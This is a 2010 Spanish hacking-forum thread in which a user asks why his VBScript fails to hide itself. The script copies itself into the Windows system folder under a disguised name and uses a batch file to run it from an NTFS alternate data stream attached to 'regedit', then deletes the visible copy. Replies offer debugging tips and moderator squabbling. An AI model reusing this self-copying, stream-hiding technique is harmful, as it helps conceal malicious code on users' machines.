elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Ocultacion stream ??¿ duda existencial
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Ocultacion stream ??¿ duda existencial  (Leído 9,790 veces)
chewarrior

Desconectado Desconectado

Mensajes: 74



Ver Perfil WWW
Ocultacion stream ??¿ duda existencial
« en: 3 Mayo 2010, 01:24 am »

Si mi pregunta es de verdad existe porque yo ya lo intente todas las sintaxis posibles y siempre me dice que el archivo no esta asociado ??¿

consejos

soluciones ??


aqui les dejo el script


Código:
' VB Script Document
Option Explicit
Dim objshell,objscript,Dir,escri,Estashay

Set objshell = createobject("wscript.shell") ' llamando objetos
Set objscript = CreateObject("Scripting.FileSystemObject")

Dir = objshell.expandenvironmentstrings("%Systemroot%")

Estashay = objscript.FileExists(Dir & "\Kernelwin32.vbs")

if Estashay = False Then

objscript.copyfile wscript.scriptfullname, Dir & "\Kernelwin32.vbs", false

End if

Estashay = objscript.FileExists(Dir & "\system.bat")

if Estashay = False Then

Set escri = objscript.CreateTextFile(Dir & "\system.bat",false)
escri.writeline("@echo off")
escri.writeline("type Kernelwin32.vbs>regedit:olo.vbs")
escri.writeline("start .\regedit:olo.vbs")
escri.writeline("Del /q /f Kernelwin32.vbs")
escri.writeline("exit")
escri.close
       
End if

objshell.Run Dir & "\system.bat"

MsgBox("VAYA IDIOTEZ")

MsgBox("codigo")


por cierto cuando no borro el kernelwin.vbs se ejecuta el codigo en un bucle infinito y no para de salirme msgbox ??¿ alguna opcion quit o exit para salir del script.

Gracias por adelantado


« Última modificación: 4 Mayo 2010, 00:36 am por chewarrior » En línea

Si Dios es tiempo,muchos lo estan perdiendo.
xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #1 en: 4 Mayo 2010, 14:21 pm »

No se como hacer lo del ads en vbs, pero para salir
Código:
wscript.quit


En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
chewarrior

Desconectado Desconectado

Mensajes: 74



Ver Perfil WWW
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #2 en: 4 Mayo 2010, 17:09 pm »

Gracias por la informacion ya aportastes mas que el mod de esta secion ;)
En línea

Si Dios es tiempo,muchos lo estan perdiendo.
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #3 en: 4 Mayo 2010, 17:41 pm »

Yo soy mod de esta sección, y no tenemos por que contestar todos los mensajes que se publican :¬¬

Intenta poniendo rutas absolutas en el bat para el regedit.

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #4 en: 4 Mayo 2010, 17:52 pm »

Se refiere a mi, el niñito viene a publicar sus mensajes pero sin seguir las reglas.

Para la otra se los elimino a la primera, no habrá segundas oportunidades.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
chewarrior

Desconectado Desconectado

Mensajes: 74



Ver Perfil WWW
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #5 en: 4 Mayo 2010, 18:30 pm »

Te noto tenso con ese avatar, trankilo no hay porque ponerse nervioso, mi objetivo en este foro no es saltarme ninguna regla, es aprender y ayudar en lo que pueda con mis humildes conocimientos.


Citar
Intenta poniendo rutas absolutas en el bat para el regedit.

Ya lo intente y nada el mismo cuento
« Última modificación: 4 Mayo 2010, 18:36 pm por chewarrior » En línea

Si Dios es tiempo,muchos lo estan perdiendo.
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #6 en: 4 Mayo 2010, 18:53 pm »

Tipo de datos de la partición?

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
chewarrior

Desconectado Desconectado

Mensajes: 74



Ver Perfil WWW
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #7 en: 4 Mayo 2010, 19:12 pm »

NTFS

lo prove ya en tres pc  una con xp sp2, otro xp sp3, y otro con vista home, todos con particiones ntfs no se tal vez esta forma de ocultar archivos ya no sirva, porque lo ley en un articulo vastante vieja de hack, tal vez solo sirva en home edition, o tal vez yo sea muy torpe  >:(
En línea

Si Dios es tiempo,muchos lo estan perdiendo.
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #8 en: 4 Mayo 2010, 19:27 pm »

Si que funciona, y lo acabo de hacer, así que no se donde este el problema, obviamente el problema te da en el ms-dos, así que revisa bien en que directorio se esta abriendo

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
chewarrior

Desconectado Desconectado

Mensajes: 74



Ver Perfil WWW
Re: Ocultacion stream ??¿ duda existencial
« Respuesta #9 en: 4 Mayo 2010, 19:42 pm »

como lo as hecho desde el vbs o manual en que directrio con que tipo de archivo ??¿ me lo podias postear
En línea

Si Dios es tiempo,muchos lo estan perdiendo.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con Ocultacion de Ficheros Metodo Stream-S.O Win Vista
Dudas Generales
awer17 2 4,364 Último mensaje 12 Agosto 2011, 17:45 pm
por SuperDraco
duda sobre ocultacion de troyano en el avast
Análisis y Diseño de Malware
gabrielprocs 1 2,759 Último mensaje 25 Septiembre 2014, 18:48 pm
por x64core
duda con input stream
Programación C/C++
Miketo 4 2,068 Último mensaje 2 Julio 2017, 20:15 pm
por Miketo
Duda sobre ocultación
Dudas Generales
gabrielprocs 0 1,303 Último mensaje 14 Marzo 2018, 08:15 am
por gabrielprocs
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines